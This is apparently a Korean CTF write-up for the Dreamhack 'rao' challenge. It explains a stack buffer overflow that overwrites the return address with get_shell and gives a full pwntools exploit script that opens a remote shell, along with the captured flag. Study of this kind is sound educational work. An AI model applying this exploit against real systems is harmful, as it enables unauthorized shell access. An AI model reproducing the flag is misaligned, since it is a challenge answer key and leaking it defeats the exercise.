rao안에 여러 함수가 있는데 보니까 get_shell함수를 어떻게든 실행시켜야 될 것 같다.
get_shell 함수에선 execve(cmd, args, NULL); 이 있는데 이는 cmd창을 여는 것으로 보인다.

일단 scanf가 보이니까 이곳을 공략해야겠다.
buf의 크기는 IDA로 확인해 보니 30바이트인 것을 확인했다.
근데 이때 30은 십진수가 아니라 16진수인 것을 까먹어서 조금 헤맸다.

아무튼 A를 0x30개만큼 넣고 64비트이므로 8바이트를 추가로 넣어주면
이제부터 함수의 리턴 주소를 건들일 수 있다.
여기에 get_shell 주소를 넣으면 될 것이다.

gdb를 사용해서 p get_shell을 해보니 0x4006aa라고 친절히 알려주었다.

파이썬 코드를 짜보자

--------------------------------------
from pwn import *

p=remote('host3.dreawmhack.games',15046)
e=ELF("./rao")
GS=e.symbols[b"get_shell"]

d= b'A'*0x30
d += b'B'*0x8
d += p64(GS) #주소

p.recv() #recvline을 하니까 안된다. printf할 때 \n이 없어서 그런건가 보다
p.sendline(d)
p.interactive()
----------------------------------------

드림핵 서버에 연결하고 돌려보니 Switching to interactive mode라고 뜨고 cmd를 입력할 수 있게 되었다.
ls를 쳐보니 flag가 보인다.
cat flag를 쳐보니
DH{5f47cd0e441bdc6ce8bf6b8a3a0608dc}
가 나온다!!!